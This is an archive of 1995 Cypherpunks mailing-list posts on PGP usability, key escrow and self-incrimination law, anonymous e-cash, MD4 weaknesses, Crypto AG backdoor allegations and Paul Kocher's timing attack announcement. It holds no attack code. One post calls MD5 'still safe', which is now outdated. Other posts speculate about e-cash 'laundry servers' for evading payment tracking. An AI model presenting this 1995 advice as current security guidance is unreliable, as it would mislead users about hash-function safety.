http://www.cs.berkeley.edu/~raph/remailer-list.html http://www.well.com/user/abacard/remail.html http://electron.rutgers.edu/~gambino/anon_servers/anon.html And learn to use Lycos. :) From ecarp at netcom.com Sun Dec 10 12:33:36 1995 From: ecarp at netcom.com (Ed Carp) Date: Sun, 10 Dec 95 12:33:36 PST Subject: More FUD from First Virtual Message-ID: <199512102134.PAA19064@khijol> > From: Adam Shostack > Subject: Re: More FUD from First Virtual > To: khijol!netcom.com!ecarp at homeport.org > Date: Sun, 10 Dec 1995 13:08:29 -0500 (EST) > Cc: cypherpunks at toad.com (Cypherpunks Mailing List) > Ed Carp wrote: > > | Adam Shostack > | > jim bell wrote: > | > > | > [Good points about cost of transactions deleted] > | > > | > | The answer, I think, it that there would be no problem finding people to > | > | take that risk in exchange for the return, ESPECIALLY if they have some > | > | input into the design (level of security) of the system. They might insist > | > | on 2048-bit RSA keys, instead of 1024-bit, for example. > | > > | > (I know its only an example, but...) > | > > | > Key length is not what is needed for better security; more > | > solid code and better interfaces are needed. (I might also argue for > | > hardware keys that are more difficult to steal..) > | > | Nonsense. The code is pretty solid, the interfaces aren't very > | difficult. What is needed is better human management of keys. Why > | brute-force, why look for weak keys, why bother calculating how much > | safer 2047-bit keys are rather than 1024-bit keys when someone can > | look on your HD and find your secret key, when they can open your > | desk drawer and find your pass phrase or password, when they can > | guess that you used your wife's maiden name as your password? > | > | Adam, I don't understand why you wrote nonsense in the first > | paragraph, then followed it up with textbook attacks such as: > > I use PGP becuase its pretty good, but if I was going to trust > all my money to it, I'd want better code (especially in key > management. And the Mac port needs a few man months of work. ;) I > don't know how solid the code is in the ecash client. I do know that > Netscape & Microsoft can't seem to ship decent code. (This is a > reflection of the way the industry has evolved; the first system to > require a bigger processor due to creeping featuritis gets the most > market share. Quality of code seems to be unimportant.) No flame at > Netscape here; they're doing what the market, conditioned by MS to > never expect bug free code, seems to want. As I understand it, the problems in the code aren't the result of the underlying algorithm being flawed, but a flawed implementation, especially in the areas of key management, RNG, and the amount of information revealed in the final encrypted product. As far as anyone can tell (unfortunately, as BS pointed out, we don't have the mathematical tools to prove one way or the other that RSA or BBS or any of that algorithmical "stuff" is secure or not) the algorithms are secure. The problem can almost always be traced back to either a poor implementation or poor QA/QC, something that TQM and all the current management buzzwords are going to do nothing to fix. > Further, the interfaces are not decent. Ever tried teaching > your mother to use PGP? I have a lot of smart freinds; a lot of them, > while understanding how easy it is to read mail in transit, haven't > found a PGP front end thats easy enough to use that they will use it. I wasn't referring to the user interface, I was referring to the code interface, but I'll comment on the user interface. For most people, crypto is *hard* to understand. If it's easy to understand, you're probably making a LOT of assumptions about key management for your user, and some of those are almost certainly going to be bad ideas - that's why PGP gives you such flexibility. If you want to shoot yourself in the foot with PGP, Phil will certainly let you, but not without warning you first. IMO, taking the complexity out of the key management process will almost certainly lead to designers and programmers making bad decisions about how the process should work, and that's going to lead to a whole host of problems, most of which will come home to roost at PZ's doorstep. Yes, you and I and most people on this list know that this is bullshit, but you'd be amazed at what people will believe - witness the "ASCII virus" crap we all had to endure a few months back. There were a lot of people who actually believed it. I haven't found *any* PGP code that was well-integrated into anyone's mailer (including my own). Maybe the code for Pegasus is different - I certainly hope so. I, as well as many people, have got wrapper scripts around vi and emacs and pico that will do automatic encryption/decryption/signing for elm and pine, but that's not Windows. If I could get my mother to use UNIX, she'd find that she can send and receive encrypted/signed email as easily as she can unencrypted/unsigned email - the back-end work has all been done for her. The problem is, she'd rathet "do Windows" - the overall OS interface (if one can all Windows an OS) is a *lot* easier to work with and understand than UNIX is. So, she's stuck with Pegasus and Eudora and such - and no way to do encryption and signing without having to go to a lot of trouble. > (This is not an invitation to send me your favorite GUI to PGP > (although if anyone has a web page of all/most of them, with reviews & > comments and maybe even screen shots, I'd like the URL.) I would, too... :) From EALLENSMITH at mbcl.rutgers.edu Sun Dec 10 13:00:40 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Sun, 10 Dec 95 13:00:40 PST Subject: More FUD from First Virtual Message-ID: <01HYNC6OW73K8Y4X93@mbcl.rutgers.edu> From: IN%"frissell at panix.com" "Duncan Frissell" 8-DEC-1995 16:15:52.58 At 02:52 PM 12/8/95 -0500, Jon Cooper wrote: > The US government can stop it. It is irrelevant what *should* stop >it, but it's extremely useful to note that the US government's political >climate of paranoia and FUD in general will certainly not allow truly >anonymous cash systems inside of our country in the forseeable future. But who's going to ask? If an anonymous payment system springs up outside the US, we can use it as a store of value if nothing else or for shopping overseas. Domestically, we can convert non-anonymous payment systems into semi-anonymous ones. What counts is difficulty of transaction and market demand not legal structure. Thus, about five minutes after the "temporary VISA card" travelers check substitutes are issued, I can start selling them for (discounted) cash to all comers. Likewise Ecash laundry servers letting anonymous people use non-anonymous Ecash. It remains to be seen how much customers value anonymity. There should be a niche market in any case. ---------------------- I would also add that what one is doing when trading digital cash is bartering for information. While the government has been successful in placing limits on point-based bartering systems such as recordkeeping and taxes, the lack of central books will make it quite hard to do so for digital cash. Trying to outlaw barter arrangements, when what is being bartered is an apparantly random string of numbers, is quite simply not going to work. -Allen From EALLENSMITH at mbcl.rutgers.edu Sun Dec 10 13:14:35 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Sun, 10 Dec 95 13:14:35 PST Subject: Still more on the Digicash protocol Message-ID: <01HYNCMO0E728Y4X93@mbcl.rutgers.edu> From: futplex at pseudonym.com (Futplex) It seems to me that end-to-end encryption is not significantly more important for remailed messages. Really, there's less information in the message when it emerges from the last remailer, so there's less to protect than in the ordinary case. Furthermore, it may not even be feasible, since I may not have a public key I can associate with my correspondent. ------------------------------------------ A possible solution: the correspondent generates a new public key and sends it as part of the transaction. The key is then wiped afterward. Sorry if this isn't possible due to something that I've misunderstood. -Allen From EALLENSMITH at mbcl.rutgers.edu Sun Dec 10 13:24:43 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Sun, 10 Dec 95 13:24:43 PST Subject: Free calls to Govt (fwd) Message-ID: <01HYND12J2KI8Y4X93@mbcl.rutgers.edu> I've been told that number is out of date. Since I forgot to save it, would someone who did check and find out? Thanks, -Allen From bdavis at thepoint.net Sun Dec 10 13:50:45 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 10 Dec 95 13:50:45 PST Subject: GAK and self-incrimination? In-Reply-To: <199512101959.NAA14976@khijol> Message-ID: On Sun, 10 Dec 1995, Ed Carp wrote: > > Date: Sun, 10 Dec 1995 02:57:36 -0800 > > To: cypherpunks at toad.com > > From: Greg Broiles > > Subject: Re: GAK and self-incrimination? > > Cc: tcmay at got.net > > > > > Tim May writes: > > > > >Consider this hypo: I send an encrypted message to a partner in crime > > >containing plans for future crimes and descriptions of past crimes. I don't > > >GAK the message. The government prosecutes me under the Anti-Terrorism and > > >Child Protection Act of 1997. > > > > > >My defense? That GAKKing the message would be tantamount to incriminating > > >myself, which the Fifth Amendment protects me against. > > > > The Fifth protects you against *compelled* self-incrimination - in > > particular, the right to be free from the "cruel trilemma" of > > > > o conviction of a substantive crime, based on your > > (true) testimony > > o conviction of perjury, for lying when asked to incriminate > > yourself > > o contempt of court sanctions, for refusing to answer > > > > but your hypo doesn't seem to create that forbidden situation. In > > particular, you're free to simply not send the message at all. > > I don't believe that that would be a consideration. Wasn't there a > court case a few years ago, in which a convicted criminal sued the > government, charging that filling out one of those forms that you > have to fill out when you buy a gun was a violation of his 5th > amendment rights? What ever happened to that case? I think you are referring to the so-called "exculpatory no" exception, which says that it is not a crime to say no on a government form when saying yes would admit a crime. That exception has been given some validity in some Circuit Courts of Appeal, but not in the Sixth Circuit where I practice. Perhaps others can comment on the Ninth Circuit, et al. If the issue has made it to the Supreme Court, I'm unaware of it (although I'd almost certainly know if the doctrine was accepted by the Court and the Sixth Circuit therefore overruled...) Morale: It may still be important *where* you are, ahem, less than completely forthcoming. EBD > I also think that, besides the obvious 5th amendment problems, there > would be a 1st amendment problem - if you "*had* to use GAK to > communicate, that would be an impermissible restriction on your 1st > amendment rights. > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From ahupp at primenet.com Sun Dec 10 13:54:09 1995 From: ahupp at primenet.com (Adam Hupp) Date: Sun, 10 Dec 95 13:54:09 PST Subject: Warning about Pegasus Mail and PGP (fwd) Message-ID: <199512102154.OAA16694@usr4.primenet.com> Where can you get the Open Encryptor PGP interface? -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa 2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6 x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+ =PtJK -----END PGP PUBLIC KEY BLOCK----- From lull at acm.org Sun Dec 10 13:54:44 1995 From: lull at acm.org (John Lull) Date: Sun, 10 Dec 95 13:54:44 PST Subject: Escrow expectations In-Reply-To: Message-ID: <30cb569a.6612409@smtp.ix.netcom.com> On Sun, 10 Dec 1995 19:25:23 +0000 (GMT), I wrote: > him to register, when it is illegal for him to posess, is a violation > of his first amendment rights. ^^^^^ I meant FIFTH, not first. Sorry. From bdavis at thepoint.net Sun Dec 10 13:55:15 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 10 Dec 95 13:55:15 PST Subject: Escrow expectations In-Reply-To: <30cae91c.1391349@smtp.ix.netcom.com> Message-ID: On Sun, 10 Dec 1995, John Lull wrote: > Russell Nelson wrote: > > > > Duncan Frissell writes: > > > > > If Clipper were mandated you might be able to resist a prosecution for > > > > "failure to file" keys or for double encrypting your transmissions if you > > > > could prove that you were transmitting illegal messages or evidence of a > > > > crime. Just as those who possess illegal weapons are not required to > > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > > > register them (self incrimination). You have to be sure your traffic is > > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > > > You are mistaken here. Failure to get a permit before turning a > > semi-auto firearm into a fully-auto machine gun, for example, is illegal > > as is possessing an unregistered machine gun ... > > My understanding was that, for example, a convicted felon in posession > of a handgun where handguns must be registered could be charged with > being a convicted felon in posession of a firearm. He could NOT be > charged with posession of an unregistered handgun, because requiring > him to register, when it is illegal for him to posess, is a violation > of his first amendment rights. In many/most federal jurisdictions, you are mistaken. See my previous note about the exculpatory no exception. Of course, he need only fill out the form if purchasing from a federally licensed firearms dealer, not, say, at a flea market. EBD Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From perry at piermont.com Sun Dec 10 14:14:35 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 10 Dec 95 14:14:35 PST Subject: Windows .PWL cracker implemented as a Word Basic virus In-Reply-To: <199512090547.FAA21624@pop01.ny.us.ibm.net> Message-ID: <199512102214.RAA22512@jekyll.piermont.com> Dan Bailey writes: > No, but they're doing something that makes me very uncomfortable: As > I read this, they're hashing the password and some other user > information using MD4 then doing some proprietary permutations on > that. Given their record with security, I'd rather they used straight > MD4, rather than throwing in something that we can't analyze. MD4 has been broken. I thought that was common knowledge. MD5 is still safe, of course. Perry From carolann at censored.org Sun Dec 10 14:39:14 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Sun, 10 Dec 95 14:39:14 PST Subject: Free calls to Govt (fwd) Message-ID: <199512102238.PAA23008@usr4.primenet.com> I did and it did not work. At 04:22 PM 12/10/95 EDT, you wrote: > I've been told that number is out of date. Since I forgot to save it, >would someone who did check and find out? > Thanks, > -Allen > > -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From sinclai at ecf.toronto.edu Sun Dec 10 14:53:45 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Sun, 10 Dec 95 14:53:45 PST Subject: Windows .PWL cracker implemented as a Word Basic virus In-Reply-To: <199512102214.RAA22512@jekyll.piermont.com> Message-ID: <95Dec10.175318edt.1732@cannon.ecf.toronto.edu> > MD4 has been broken. I thought that was common knowledge. MD5 is still > safe, of course. > > Perry My understanding was that MD4 had been broken once, at the cost of much computer time. Is it not still considered strong enough for casual use, much as a 512-bit RSA key is? From gbroiles at darkwing.uoregon.edu Sun Dec 10 14:54:15 1995 From: gbroiles at darkwing.uoregon.edu (Greg Broiles) Date: Sun, 10 Dec 95 14:54:15 PST Subject: GAK and self-incrimination? Message-ID: <199512102233.AA10816@ideath.goldenbear.com> Ed Carp writes: > Greg Broiles writes: >> Tim May writes: >> >> >Consider this hypo: I send an encrypted message to a partner in crime >> >containing plans for future crimes and descriptions of past crimes. I >> >don't GAK the message. The government prosecutes me under the >> >Anti-Terrorism and Child Protection Act of 1997. >> > >> >My defense? That GAKKing the message would be tantamount to incriminating >> >myself, which the Fifth Amendment protects me against. > >> The Fifth protects you against *compelled* self-incrimination . . . In >> particular, you're free to simply not send the message at all. > >I don't believe that that would be a consideration. Wasn't there a >court case a few years ago, in which a convicted criminal sued the >government, charging that filling out one of those forms that you >have to fill out when you buy a gun was a violation of his 5th >amendment rights? What ever happened to that case? This sounds like _Haynes v. United States_ 390 US 85 (1968); the Supreme Court ruled that requiring registration of particular weapons (possession of which was illegal) violated the Fifth Amendment. The difference between _Haynes_ (and _Albertson v. Subversive Activities Control Board_ 382 US 70 (1965)) and Tim's hypo is that Tim's hypo doesn't force only guilty people to provide information, it requires all people using crypto to do so - so it's not targeted at "persons inherently suspect of criminal activities" (see _Haynes_ at 96, _Anderson at 79), and it doesn't necessarily give rise to "real and appreciable hazards of incrimination" (_Haynes_ at 97). But it seems to me that the real bottom line is that the information which is compelled is not incriminating, and the information which is incriminating is not compelled. The keys to my crypto might lead to incriminating evidence, or they might prove to be useful in a prosecution, but they're not in themselves any sort of a signal that a crime has been or will be committed. I think it's a different argument - and probably even comes out the other way - if the command to reveal a key is made to a particular individual in circumstances where possession/knowledge of the key is likely to implicate the holder in criminal activity. If the police find an encrypted disk which is labelled "The Story of How I Killed Jimmy Hoffa and Where I Put His Body and the Murder Weapon", compelling someone to reveal the key which decrypts the file(s) on that disk seems incriminating, even if the information produced (the string of binary digits which is the key) isn't by itself incriminating. Is it "self-incrimination" to require people to provide the government with an address when they register a car, even though the police may use that address to look for evidence if you're suspected of a crime? Is it "self-incrimination" to require drivers involved in an auto accident to remain at the scene and provide a name and address to cops or other drivers? (Supreme Court says no self-incrim re hit & run statute, _California v. Byers_, 402 US 424 (1971).) (Now, if the government required people who weren't using GAK to provide a "Statement of Refusal to Comply with GAK", I think it'd be a different kettle of fish entirely.) I'm not trying to say that I think GAK is good - I think it's awful. But I don't think it's incompatible with the way that the Fifth amendment has been interpreted over the past 200 years. I think it's possible to ignore those interpretations and make up your own, but I don't think that's of much practical utility where the dominant local gang doesn't find your theory plausible or expedient. So much for the rule of law. >I also think that, besides the obvious 5th amendment problems, there >would be a 1st amendment problem - if you "*had* to use GAK to >communicate, that would be an impermissible restriction on your 1st >amendment rights. I agree with you re the First amendment. -- "The anchored mind screwed into me by the psycho- Greg Broiles lubricious thrust of heaven is the one that thinks every temptation, every desire, every inhibition." greg at goldenbear.com -- Antonin Artaud gbroiles at darkwing.uoregon.edu From perry at piermont.com Sun Dec 10 14:56:29 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 10 Dec 95 14:56:29 PST Subject: Windows .PWL cracker implemented as a Word Basic virus In-Reply-To: <95Dec10.175318edt.1732@cannon.ecf.toronto.edu> Message-ID: <199512102256.RAA22618@jekyll.piermont.com> SINCLAIR DOUGLAS N writes: > My understanding was that MD4 had been broken once, at the cost of > much computer time. Is it not still considered strong enough for > casual use, much as a 512-bit RSA key is? You can get export licenses for systems using 512 bit RSA. I'll leave the rest to your imagination. I generally don't believe in using stupid algorithms if good ones are around and cost no more. MD5 isn't more expensive than MD4 except if you are in some very borderline sort of case. Perry From daw at quito.CS.Berkeley.EDU Sun Dec 10 15:22:56 1995 From: daw at quito.CS.Berkeley.EDU (David A Wagner) Date: Sun, 10 Dec 95 15:22:56 PST Subject: Windows .PWL cracker implemented as a Word Basic virus Message-ID: <199512102320.SAA08162@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <95Dec10.175318edt.1732 at cannon.ecf.toronto.edu>, SINCLAIR DOUGLAS N wrote: > My understanding was that MD4 had been broken once, at the cost of > much computer time. Not *that* much computer time... In my copy of Hans Dobbertin's paper, the abstract says ``An implementation of our attack allows to find collisions for MD4 in less than a minute on a PC.'' As far as I know, the difficulty of inverting MD4 is still an open problem -- but why would you want to use a broken algorithm like MD4 when you can use MD2, MD5, or SHA? - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMMtrRCoZzwIn1bdtAQGQwQF+JlWjDgMCs+Y6nO/tUzrXcd9wJCrTLHx2 NlC+1bHspTvJSXSD29M73rfeyOfWOTtQ =4jl6 -----END PGP SIGNATURE----- From johnny at engineering.ucsb.edu Sun Dec 10 16:45:54 1995 From: johnny at engineering.ucsb.edu (John H. Wynne) Date: Sun, 10 Dec 95 16:45:54 PST Subject: mailing List Message-ID: <199512110045.AAA06366@gear> Please put me on your mailing list From frogfarm at yakko.cs.wmich.edu Sun Dec 10 17:27:21 1995 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Sun, 10 Dec 95 17:27:21 PST Subject: [NOISE] REQ: "Markov" filter as recently posted in .shar form Message-ID: <199512110127.UAA22346@yakko.cs.wmich.edu> Apologies, but I already tried all standard net searches on this. Someone recently posted a .shar archive for a program called Markov, which filters input Usenet posts and outputs a reasonable facsimile of that person's "style". (It was posted in one of the "Alice" threads, in response to the claim that posting styles could be a unique form of identification.) I also looked on the archives at hks.net, but had no luck there. If some kind person will post it again, I'll give it a home on my page of WWW resources. I have the binary, and am impressed and amused enough to keep it for regular use.. anyone for alt.usenet.kooks.markov? -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona Hate, hate your enemies save, save your friends find, find your place I feel a groove comin' on | speak..speak the truth | Freedom...yeah, right. From nobody at REPLAY.COM Sun Dec 10 17:30:13 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 10 Dec 95 17:30:13 PST Subject: GAK Query Message-ID: <199512110128.CAA13387@utopia.hacktic.nl> Steven Miller, in his "Civilizing Cyberspace," remarks in his coverage of encryption issues that: ... the Administration is trying to split the [GAK] opposition by working with private industry groups on compromise escrow strategies that would let government agents see the contents of decoded messages without getting access to the escrowed key itself. [p. 306] Does anyone know more about this tactic, whether it is being pursued, or the legal and technical procedures for decoding and seeing the messages? As previously noted here: Civilizing Cyberspace: Policy, Power and the Information Highway Steven E. Miller (CPSR Board) Addison Wesley, 1996 ISBN 0-201-84760-4 From sinclai at ecf.toronto.edu Sun Dec 10 17:48:45 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Sun, 10 Dec 95 17:48:45 PST Subject: MD4 In-Reply-To: <199512102320.SAA08162@bb.hks.net> Message-ID: <95Dec10.204825edt.1935@cannon.ecf.toronto.edu> > SINCLAIR DOUGLAS N wrote: > > My understanding was that MD4 had been broken once, at the cost of > > much computer time. > > Not *that* much computer time... I stand corrected. I've not read the original paper. > As far as I know, the difficulty of inverting MD4 is still an open > problem -- but why would you want to use a broken algorithm like MD4 > when you can use MD2, MD5, or SHA? Granted. A brute force attack on MD4 takes 2^64 times more operations to invert it than it does to find matching pairs if I remember correctly. However a clever algorithm would reduce that. Of course with MD5 as a plug-in replacement that's only 30% slower this isn't a big problem. Looks like the safety belts are worth while after all. From Ulf_Moeller at public.uni-hamburg.de Sun Dec 10 18:31:41 1995 From: Ulf_Moeller at public.uni-hamburg.de (Ulf Moeller) Date: Sun, 10 Dec 95 18:31:41 PST Subject: NSA rigs Crypto machines according to Balto Sun Message-ID: pcw at access.digex.net (Peter Wayner) writes: >So, is this what happened at Crypto AG? Is this what happened at Netscape? What happened to Crypto AG is that they are -- at least partly -- *owned* by the German secret service BND. I'll try to give a rough translation of a section from a book by Erich Schmidt-Eenboom: "The BND would like to put a Clipper chip of their own, an exclusive federal German back-door, into the encryption devices delivered abroad. Rumors are persistent that this already happens -- illegally, of course. For that purpuse, camouflage companies such as the Crypto AG in the Swiss Steinhausen am Zuger are preferredly used. A former Crypto financial manager confirmed to FOCUS magazine: The company's owner is the Federal Republic of Germany. Crypto AG has been delivering crypto devices to armies, polices and secret services in about 120 countries for over 40 years. The enterprise got into the headlines when Crypto employee Hans Buehler was arrested in March 1992 in Iran for threadbare espionage accusations and was released only 9 1/2 months later on bail of one million dollars. The true reasons for the arrest can only be guessed. According to the records of the Bern police, Buehler was classified as a security risk after his release by the west German ministry of defense and then was fired by Crypto AG. The Zuerich lawyer office assigned with indemnification claims, Gloor & Sieger, draws the conclusion that "Iran has been suspecting for some longer time that the crypto deviced delivered by Crypto AG had never or no more conformed with Iranian security needs". Further they state: "It is a fact (...) that for several years, articles kept appearing in the international press reporting decryption of classified messages encrypted with Crypto devices". Some signs indicate that the suspection that Crypto devices have been manipulated on purpuse is not at all out of place. During his arrest in Iran, Buehler has been interrogated about reports in news articles of the above kind for months. Crypto devices have been tested and certified by the BND central office for encryption affairs and later by the BSI. In addition to that: After the murder of exile politician Bachtiar by an Iranian death commando in Paris, the BND decrypted an encrypted radio message by the Iranian secret service VEVAK at no effort." German original: From: frank at artcom.de (Frank Rieger) Newsgroups: de.org.ccc Subject: Crypto AG (Beh�rdenverschl�sselung) Date: Wed, 28 Jun 1995 15:13:31 +0200 Organization: ART + COM Lines: 26 Distribution: world Message-ID: In der Liste der Firmen die Verschl�sselungsger�te f�r Beh�rden anbieten war auch die Crypto AG in der Schweiz. Zu dieser Firma fand ich gerade eine interessante Textstelle in (1): "Den eigenen Clipper-Chip, das exklusive bundesdeutsche Hintertuerchen, wuerde der BND gerne in Verschluesselungsgeraete einbauen die ins Ausland geliefert werden. Hartnaekig haelt sich das Geruecht, dass dies manchmall bereits geschieht - illegalerweise, versteht sich. Dabei bedient man sieh hevorzugt Tarnfirmen wie etwa der Crypto AG im schweizerischen Steinhausen am Zuger . Eine Firma, von der ein Ex-Crypto-Finanzmanager gegenueber der Zeitschrift FOCUS bestaetigte: Besitzer der Firma ist die Bundesrepu blik. Die Crypto AG ruestet seit Ueber 40 Jahren Armeen, Polizei und Geheimdienste in rund 120 Laendern mit Verschluesselungsgeraeten aus. In die Schlagzeilen geriet das Unternehmen, als der Crypto-Mitarbeiter Hans Buehler unter fadenscheinigem Spionagevorwurf im Maerz 1992 im lran verhaftet wurde und erst neuneinhalb Monate spaeter gegen Zahlung einer Kaution von einer Million Dollar freikam. Ueber den wahren Grund der Verhaftung lassen sich nur Vermutungen anstellen. Laut Akten der Berner Polizei wurde Buehler nach seiner Haftentlassung vom westdeutschen Verteidigungsministerium als Sicherheitsrisiko eingestuft und daraufhin von der Crypto AG entlassen. Das mit Schadenersatzfarderungen betraute Zuericher Anwaltsbuero Gloor & Sieger kommt in einem Schriftsatz zu dem Schluss, "dass der Iran schon seit laengerer Zeit den Verdacht hegte, dass die von der Crypto AG gelieferten Chiffriergeraete den iranischen Sieherheitsbeduerfnissen nicht oder nicht mehr entspraechen". Weiter heisst es :"Tatsache ist (. . .), dass ueber mehrere Jahre hinweg immer wieder Artikel in der internationalen Presse erschienen sind, welche von der angehliehen Dekryptierung von klassitizierten Meldungen, welche mit Crypto-Geraeten chiffriert worden sind, berichten." Einige Indizien deuten darauf hin dass der Verdacht, Crypto-Geraete seien mit Absicht manipuliert worden, keineswegs abwegig ist. Ueber Berichte in Zeitungsartikeln der erwaehnten Art wurde Buehler waehrend seiner Haft im Iran ueber Monate weg verhoert. Crypto-Geraete sind von der BND-Zentralstelle fuer Chiffrierwesen und spaeter vom BSl geprueft und abgenommen worden. Hinzu kommt noch folgendes: Nach der Ermordung des Exilpolitikers Bachtiar durch ein iranisches Todeskommando in Paris war es dem BND ein l eichtes, einen verschluesselten Funkspruch des iranischen Geheimdienstes VEVAK zu dechiffrieren." (1): Schmidt-Eenboom, Erich: Die schmutzigen Gesch�fte der Wirtschaftsspione; ECON Verlag 1994, S. 230f. (OCR-&Konvertierungsfehler vorbehalten) From mab at research.att.com Sun Dec 10 19:14:36 1995 From: mab at research.att.com (Matt Blaze) Date: Sun, 10 Dec 95 19:14:36 PST Subject: Paul Kocher's timing attack Message-ID: <199512110312.WAA14627@nsa.tempo.att.com> Paul Kocher's brutally clever timing attack against on-line implementations of RSA, DSA and fixed-exponent Diffie-Hellman is reported on page A1 of Monday's New York Times ("Secure Digital Transactions Just Got a Little Less Secure" by John Markoff). The attack requires only a few thousand ciphertext samples and works against most implementations of public-key cryptosystems in which the attacker can measure accurately the target's computation time for each sample. I think Kocher's paper is online somewhere; I'll post the URL when I find it. -matt From klong at phoenix.net Sun Dec 10 20:26:02 1995 From: klong at phoenix.net (Siberia) Date: Sun, 10 Dec 95 20:26:02 PST Subject: Warning about Pegasus Mail and PGP (fwd) Message-ID: <199512110425.WAA13887@phoenix.net> ftp://ftp.aimnet.com/users/jnavas/winpmail/ On 10 Dec 95 at 4:07, Adam Hupp wrote: > Where can you get the Open Encryptor PGP interface? Namaste' Kimberly Long klong at phoenix.net What is life? It is the flash of a firefly in the night. It is the breath of a buffalo in the wintertime. It is the little shadow which runs across the grass and loses itself in the sunset. ~Crowfoot 1821-1890 )O( From lull at acm.org Sun Dec 10 20:46:26 1995 From: lull at acm.org (John Lull) Date: Sun, 10 Dec 95 20:46:26 PST Subject: Paul Kocher's timing attack In-Reply-To: <199512110312.WAA14627@nsa.tempo.att.com> Message-ID: <30cbb71c.21744721@smtp.ix.netcom.com> Matt Blaze wrote: > I think Kocher's paper is online somewhere; I'll post the URL > when I find it. ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps.gz From karlton at netscape.com Sun Dec 10 21:22:41 1995 From: karlton at netscape.com (Phil Karlton) Date: Sun, 10 Dec 95 21:22:41 PST Subject: Paul Kocher's timing attack In-Reply-To: <199512110312.WAA14627@nsa.tempo.att.com> Message-ID: <30CBBF9E.6173@netscape.com> John Lull wrote: > ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps > ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps.gz The ftp server does not seem to be working. You are better off starting at http://ftp.cryptography.com or going directly to http://ftp.cryptography.com//timingattack.html PK -- Philip L. Karlton karlton at netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety. - Benjamin Franklin From jsw at netscape.com Sun Dec 10 21:43:05 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sun, 10 Dec 95 21:43:05 PST Subject: Paul Kocher's timing attack In-Reply-To: <199512110312.WAA14627@nsa.tempo.att.com> Message-ID: <30CBC3A3.6506@netscape.com> You can find info about Paul's attack at: http://www.cryptography.com --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From pck at netcom.com Sun Dec 10 21:50:16 1995 From: pck at netcom.com (Paul C. Kocher) Date: Sun, 10 Dec 95 21:50:16 PST Subject: Announce: Timing cryptanalysis of RSA, DH, DSS Message-ID: <199512110548.VAA08989@netcom3.netcom.com> I've just released details of an attack many of you will find interesting since quite a few existing cryptography products and systems are potentially at risk. The general idea of the attack is that secret keys can be found by measuring the amount of time used to to process messages. The paper describes attacks against RSA, fixed- exponent Diffie-Hellman, and DSS, and the techniques can work with many other systems as well. My research on the subject is still in progress and the current paper does not include many of my findings. I will eventually publish a full paper, but am releasing a preliminary draft now to alert the community as quickly as possible. A copy of the abstract is attached at the end of this message and the full text can be downloaded in PostScript format from: ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps.gz I've also made an HTML version which is accessible at: http://www.cryptography.com (The HTML uses subscripts and superscripts which aren't supported in older web browsers. The PostScript version is the "official" one and looks nicer.) The results have already been seen by Matt Blaze, Martin Hellman, Ron Rivest, Bruce Schneier, and many others. While the full significance of the attack is not yet known, I think everyone who has seen it considers it important (including Netscape who awarded me a $1000 bugs bounty prize). ABSTRACT. Cryptosystems often take slightly different amounts of time to process different messages. With network- based cryptosystems, cryptographic tokens, and many other applications, attackers can measure the amount of time used to complete cryptographic operations. This abstract shows that timing channels can, and often do, leak key material. The attacks are particularly alarming because they often require only known ciphertext, work even if timing measurements are somewhat inaccurate, are computationally easy, and are difficult to detect. This preliminary draft outlines attacks that can find secret exponents in Diffie- Hellman key exchange, factor RSA keys, and find DSS secret parameters. Other symmetric and asymmetric cryptographic functions are also at risk. A complete description of the attack will be presented in a full paper, to be released later. I conclude by noting that closing timing channels is often more difficult than might be expected. Cheers, Paul Kocher ********************************************************************* VERY IMPORTANT: If you send me e-mail, please understand that I probably won't have time to respond to all who write. Please keep messages SHORT and send them to pck at cryptography.com (**not** my netcom address -- misdirected messages will be 